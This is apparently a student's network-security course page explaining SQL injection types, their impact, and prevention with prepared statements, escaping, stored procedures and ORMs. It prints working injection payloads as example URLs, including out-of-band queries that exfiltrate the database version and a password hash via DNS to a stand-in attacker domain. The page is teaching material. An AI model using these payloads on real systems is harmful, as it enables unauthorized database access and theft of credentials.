# <h1 style="color:#312392;">**What is SQL injection (SQLi)?</h1>** <p style="font-size:18px;">SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. This can allow an attacker to view data that they are not normally able to retrieve. This might include data that belongs to other users, or any other data that the application can access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior. In some situations, an attacker can escalate a SQL injection attack to compromise the underlying server or other back-end infrastructure. It can also enable them to perform denial-of-service attacks.</p> <img src="https://www.kratikal.com/blog/wp-content/uploads/2020/06/sQL-.png" alt="Alt Text" style=" box-shadow: 5px 7px 20px #8888;"> # <h1 style="color:#312392;">**The Different Types of SQL Injection Vulnerability:**</h1> <div style="font-size:18px"> Attackers can exfiltrate data from servers by exploiting SQL Injection vulnerabilities in various ways. Common methods include retrieving data based on errors, conditions (true/false), and timing. <ul> <li>Error-Based SQL Injection:<br>When exploiting an error-based SQL Injection vulnerability, attackers can retrieve information such as table names and content from visible database errors.</li> </ul> <h6> Error-Based SQL Injection Example: </h6> https://example.com/index.php?id=1+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) <br> This Request Returned an Error<br> Duplicate entry 'database1' for key 'group_key' The same method works for table names and content. Disabling error messages on production systems helps to prevent attackers from gathering such information. <ul><li>Boolean-Based SQL Injection:<br> Sometimes there is no visible error message on the page when a SQL query fails, making it difficult for an attacker to get information from the vulnerable application. However, there is still a way to extract information. <h6>When a SQL query fails, sometimes some parts of the web page disappear or change, or the entire website can fail to load. These indications allow attackers to determine whether the input parameter is vulnerable and whether it allows extraction of data.<br>Attackers can test for this by inserting a condition into a SQL query:</h6> https://example.com/index.php?id=1+AND+1=1 <h6>If the page loads as usual, it might indicate that it is vulnerable to a SQL Injection. To be sure, an attacker typically tries to provoke a false result using something like this:</h6> https://example.com/index.php?id=1+AND+1=2 </li> </ul> <ul> <li>Time-Based SQL Injection:<br>In some cases, even though a vulnerable SQL query does not have any visible effect on the output of the page, it may still be possible to extract information from an underlying database. Hackers determine this by instructing the database to wait (sleep) a stated amount of time before responding. If the page is not vulnerable, it will load quickly; if it is vulnerable it will take longer than usual to load. This enables hackers to extract data, even though there are no visible changes on the page. The SQL syntax can be similar to the one used in the Boolean-Based SQL Injection Vulnerability.<h6>But to set a measurable sleep time, the 'true' function is changed to something that takes some time to execute, such as 'sleep(3)' which instructs the database to sleep for three seconds:</h6> https://example.com/index.php?id=1+AND+IF(version()+LIKE+'5%',sleep(3),false) If the page takes longer than usual to load it is safe to assume that the database version is 5.X. </li> </ul> <ul> <li>Out-of-Band SQL Injection Vulnerability:<br>Sometimes the only way an attacker can retrieve information from a database is to use out-of-band techniques. Usually, these types of attacks involve sending the data directly from the database server to a machine that is controlled by the attacker. Attackers may use this method if an injection does not occur directly after the supplied data is inserted, but at a later point in time.<h6> Out-of-Band Example:</h6> https://example.com/index.php?id=1+AND+(SELECT+LOAD_FILE(concat('\\\\',(SELECT @@version),'example.com\\'))) <br> https://www.example.com/index.php?query=declare @pass nvarchar(100);SELECT @pass=(SELECT TOP 1 password_hash FROM users);exec('xp_fileexist ''\\' + @pass + '.example.com\c$\boot.ini''') In these requests, the target makes a DNS request to the attacker-owned domain, with the query result inside the subdomain. This means that an attacker does not need to see the result of the injection, but can wait until the database server sends a request instead. </li> </ul> </div> # <h1 style="color:#312392;">**The impact of a successful SQL injection attack:** </h1> <p style="font-size:18px;"> A successful SQL injection attack can result in unauthorized access to sensitive data, such as:</p> <ul style="font-size:18px"> <li>Passwords.</li> <li>Credit card details.</li> <li>Personal user information.</li> </ul> <p style="font-size:18px;"> SQL injection attacks have been used in many high-profile data breaches over the years. These have caused reputational damage and regulatory fines. In some cases, an attacker can obtain a persistent backdoor into an organization's systems, leading to a long-term compromise that can go unnoticed for an extended period. </p> # <h1 style="color:#312392;"> **Preventing SQL injection attacks:** </h1> <div style="font-size:18px"> <ul> <li>Parameterized Statements (Prepared Statements):<br> Utilize parameterized statements or prepared statements in your database queries. These mechanisms segregate SQL code from user input, significantly reducing the risk of injecting malicious SQL code. This practice is especially prevalent in languages like Java where you can leverage frameworks such as JDBC.</li> </ul> <h6> Example (Java): </h6> String>String sql = "SELECT * FROM users WHERE username = ? AND password = ?"; PreparedStatement statement = connection.prepareStatement(sql); statement.setString(1, userProvidedUsername); statement.setString(2, userProvidedPassword); ResultSet result = statement.executeQuery(); <br> <ul> <li>Input Validation and Sanitization:<br> Implement rigorous input validation to ensure that user inputs adhere to expected formats and data types. Reject any input that does not meet the defined validation criteria. Additionally, employ input sanitization techniques to eliminate or escape potentially harmful characters.</li> </ul> <h6> Exmple(PHP): </h6> $username = mysqli_real_escape_string($conn, $_POST['username']); $password = mysqli_real_escape_string($conn, $_POST['password']); <br> <ul> <li>Least Privilege Principle:<br> Adhere to the principle of least privilege when configuring the database accounts used by your web application. Limit the permissions of these accounts to the bare minimum required for their designated functions. This practice reduces the potential impact of a successful SQL injection attack.</li> </ul> <ul> <li>Stored Procedures:<br> Leverage stored procedures to encapsulate SQL logic within the database. By doing so, you restrict the execution of arbitrary SQL code and enhance the overall security posture. This is especially effective in database systems like SQL Server.</li> </ul> <h6> Example(SQL server): </h6> CREATE PROCEDURE GetUser @username NVARCHAR(50) AS SELECT * FROM users WHERE username = @username; <ul> <li>ORMs (Object-Relational Mapping):<br> Consider employing Object-Relational Mapping (ORM) frameworks that automate the process of parameterization and escaping user inputs. ORM frameworks abstract away low-level SQL interactions, providing a higher level of security by minimizing the need for manual query construction.</li> </ul> <h6> Example(Django-Python): </h6> users = User.objects.filter(username=userProvidedUsername, password=userProvidedPassword) </div> <hr> <p style="color:gray; text-align:center;font-weight:bold; background-color:#deffff;margin-bottom:0px">Network Security <br>Name : Qusay M. Alfarra<br>ID : 120190166 <br> T.A : Eng. Hussien K. Abu Eliewa</p> <h6 style="text-align:center; background-color:#deffff; padding:0px; margin-top:0px; padding-bottom:8px"> C o p y r i g h t © 2 0 2 3 </h6>